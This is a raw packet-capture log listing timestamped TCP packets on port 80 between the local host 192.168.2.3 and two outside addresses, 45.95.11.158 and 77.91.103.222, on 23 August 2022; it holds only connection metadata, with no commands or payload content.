Aug 23, 2022 18:24:02.826859951 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.826869965 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.826890945 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.826906919 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.826914072 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.826932907 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.826952934 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.827091932 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.827136993 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.827142000 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.827163935 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.827179909 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.827210903 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.827229023 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.827258110 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.827282906 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.827286005 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.827311993 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.827331066 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.827373981 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.827413082 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.827420950 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.827435970 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.827455997 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.827459097 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.827474117 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.827496052 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.827501059 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.827517033 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.827541113 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.827564001 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.827580929 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.827598095 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.827622890 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.827712059 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.827759027 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.827853918 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.827913046 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.827917099 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.827945948 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.827956915 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.827986956 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.828073978 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.828098059 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.828123093 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.828139067 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.828232050 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.828255892 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.828280926 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.828301907 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.828306913 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.828332901 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.828352928 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.828375101 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.828377008 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.828398943 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.828416109 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.828454971 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.828466892 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.828512907 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.828589916 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.828613997 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.828638077 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.828648090 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.828664064 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.828686953 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.828707933 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.828727961 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.828746080 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.828787088 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.828788042 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.828810930 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.828829050 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.828836918 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.828850985 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.828880072 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.828890085 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.828916073 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.828939915 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.828952074 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.828968048 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.828984022 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.828985929 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.829006910 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.829027891 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.829029083 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.829044104 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.829070091 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.829094887 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.829135895 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.829143047 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.829180002 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.829220057 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.829245090 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.829266071 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.829284906 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.829286098 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.829312086 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.829329967 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.829338074 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.829354048 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.829375029 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.829380989 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.829396963 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.829420090 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.829420090 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.829428911 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.829461098 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.829463959 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.829498053 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.829505920 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.829555988 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.829560041 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.829610109 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.829627037 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.829648972 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.829674959 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.829688072 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.836472988 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.836518049 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.836553097 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.836560965 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.836581945 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.836581945 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.836591959 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.836610079 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.836648941 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.836648941 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.836668968 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.836673021 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.836694956 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.836702108 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.836721897 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.836730957 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.836745024 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.836760998 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.836775064 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.836781979 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.836803913 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.836813927 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.838540077 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.838635921 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.838812113 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.838870049 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.838876009 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.838907003 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.838929892 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.838936090 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.838953972 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.839005947 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.858597040 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.858643055 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.858669043 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.858714104 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.858989954 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.859023094 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.859050035 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.859071016 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.859128952 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.859163046 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:02.860697031 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.860728025 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.860789061 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.860836029 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.860860109 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.860918999 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.860939026 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.860987902 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.861099005 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.861152887 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.861188889 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.861226082 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.861249924 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.861378908 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.861478090 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.861561060 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.861587048 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.861634016 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.861650944 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.861713886 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.861738920 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.861774921 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.861788988 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.861808062 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.861820936 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.861855030 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.861866951 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.861929893 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.861952066 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.862015009 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.862075090 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.862178087 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.862215042 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.862251043 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.862287045 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.862320900 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.862355947 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.862391949 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.862428904 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.862463951 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.862521887 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.862546921 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.862564087 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.862593889 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.862600088 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.862633944 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.862668991 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.862730980 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.862932920 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.976978064 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:02.977643013 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:02.997051954 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.042685032 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.043189049 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.043214083 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.043251991 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.043301105 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.043314934 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.043317080 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.043338060 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.043375969 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.043386936 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.043396950 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.043399096 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.043428898 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.043469906 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.043473005 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.043493986 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.043580055 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.043639898 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.043661118 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.043664932 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.089153051 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.089184046 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.089206934 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.089227915 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.089248896 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.089270115 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.089291096 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.089308977 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.089313030 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.089337111 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.089342117 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.089345932 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.089360952 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.089382887 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.089440107 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.089462042 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.089482069 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.089497089 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.089502096 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.089503050 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.089505911 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.089529991 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.089550018 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.089555025 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.089575052 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.089592934 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.089617968 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.089668989 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.089811087 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.089833021 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.089854002 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.089874983 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.089875937 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.089881897 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.089884996 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.089889050 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.090477943 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.135005951 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.135051966 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.135086060 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.135113001 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.135221004 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.135247946 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.135395050 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.135443926 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.135448933 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.135481119 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.135538101 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.135548115 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.135610104 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.135637045 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.135668993 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.135683060 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.135720968 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.135752916 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.135760069 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.135797024 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.135804892 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.135857105 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.135924101 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.135932922 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.135940075 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.135986090 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.136089087 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.136152029 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.136260033 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.136286974 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.136343002 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.136347055 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.136368990 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.136396885 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.136445999 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.136455059 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.136457920 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.136523962 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.136567116 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.136573076 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.136702061 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.136768103 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.136806011 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.136836052 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.136846066 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.136874914 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.136895895 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.136907101 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.136940956 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.136972904 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.136982918 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.136986017 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.137140989 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.137152910 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.137197971 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.137223959 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.137239933 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.137243986 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.137267113 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.137294054 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.137337923 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.137377977 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.137381077 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.137382984 CEST	49844	80	192.168.2.3	77.91.103.222
